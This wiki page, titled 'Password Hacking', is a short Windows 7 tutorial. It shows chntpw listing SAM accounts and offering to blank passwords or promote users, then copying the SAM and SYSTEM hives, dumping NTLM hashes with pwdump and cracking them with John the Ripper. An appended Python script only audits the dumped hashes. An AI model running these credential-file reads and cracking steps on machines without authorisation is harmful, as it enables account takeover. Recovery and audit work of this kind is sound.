Password Hacking

From Xinux Wiki

Windows 7

chntpw

list

  • chntpw -l SAM
chntpw version 1.00 140201, (c) Petter N Hagen
Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf>
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes.

| RID -|---------- Username ------------| Admin? |- Lock? --|
| 01f4 | Administrator                  | ADMIN  | dis/lock |
| 01f5 | Gast                           |        | dis/lock |
| 03e9 | Jan                            | ADMIN  |          |
| 03ee | thomas                         | ADMIN  |          |
| 03ec | xinux                          | ADMIN  |          |

edit

  • chntpw -u xinux SAM
chntpw version 1.00 140201, (c) Petter N Hagen
Hive <SAM> name (from header): <\SystemRoot\System32\Config\SAM>
ROOT KEY at offset: 0x001020 * Subkey indexing type is: 666c <lf>
File size 262144 [40000] bytes, containing 8 pages (+ 1 headerpage)
Used for data: 291/56144 blocks/bytes, unused: 18/9136 blocks/bytes.

================= USER EDIT ====================

RID     : 1004 [03ec]
Username: xinux
fullname: xinux
comment : 
homedir : 

00000220 = Administratoren (which has 4 members)
000003ed = HomeUsers (which has 2 members)

Account bits: 0x0010 =
[ ] Disabled        | [ ] Homedir req.    | [ ] Passwd not req. | 
[ ] Temp. duplicate | [X] Normal account  | [ ] NMS account     | 
[ ] Domain trust ac | [ ] Wks trust act.  | [ ] Srv trust act   | 
[ ] Pwd don't expir | [ ] Auto lockout    | [ ] (unknown 0x08)  | 
[ ] (unknown 0x10)  | [ ] (unknown 0x20)  | [ ] (unknown 0x40)  | 

Failed login count: 0, while max tries is: 0
Total  login count: 14

- - - - User Edit Menu:
 1 - Clear (blank) user password
(2 - Unlock and enable user account) [seems unlocked already]
 3 - Promote user (make user an administrator)
 4 - Add user to a group
 5 - Remove user from a group
 q - Quit editing user, back to user select

John the Ripper

  • cd /mnt/Windows/System32/config
  • cp SAM SYSTEM /root
  • cd /root
  • pwdump SYSTEM SAM > hash.txt
  • cat hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:94aa68f72ab39cfec7ffcb58dca3358c:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jan:1001:aad3b435b51404eeaad3b435b51404ee:18af5f2d758336eade8dd06361c6acc2:::
xinux:1004:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6:::
thomas:1006:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6::
  • john hash.txt -format=nt2 -users=xinux
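
The following added example (not part of the original wiki page) parses the `user:rid:lm:nt:::` records in `hash.txt` from an auditor's point of view and reports blank passwords, stored LM hashes and accounts sharing one NT hash, without cracking anything. The function names `is_hash`, `parse_pwdump` and `audit` are chosen for this example.

```python
import string
from collections import defaultdict

# LM and NT hash of the empty password (well-known constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# hash.txt exactly as shown on this page (the last record is cut short there).
PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:94aa68f72ab39cfec7ffcb58dca3358c:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jan:1001:aad3b435b51404eeaad3b435b51404ee:18af5f2d758336eade8dd06361c6acc2:::
xinux:1004:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6:::
thomas:1006:aad3b435b51404eeaad3b435b51404ee:912b772615d5d5c2619ea89650f923f6::
"""

def is_hash(value):
    """True for a 32-digit hex string; rejects textual placeholders."""
    return len(value) == 32 and all(c in string.hexdigits for c in value)

def parse_pwdump(text):
    """Yield (user, rid, lm, nt) for every 'user:rid:lm:nt:::' line."""
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue  # not a pwdump record
        user, rid, lm, nt = fields[:4]
        yield user, int(rid), lm.lower(), nt.lower()

def audit(text):
    """Return blank-password users, users with a real LM hash, shared NT hashes."""
    findings = {"blank": [], "lm_stored": [], "shared": []}
    by_nt = defaultdict(list)
    for user, _rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            findings["blank"].append(user)
        elif is_hash(nt):
            by_nt[nt].append(user)  # NT hashes are unsalted: equal hash, equal password
        if is_hash(lm) and lm != EMPTY_LM:
            findings["lm_stored"].append(user)
    findings["shared"] = sorted(sorted(u) for u in by_nt.values() if len(u) > 1)
    return findings

if __name__ == "__main__":
    for kind, hits in audit(PWDUMP).items():
        print(f"{kind}: {hits}")
```

On the page's data this reports `Gast` with the empty NT hash, no stored LM hashes, and `thomas` and `xinux` sharing one password.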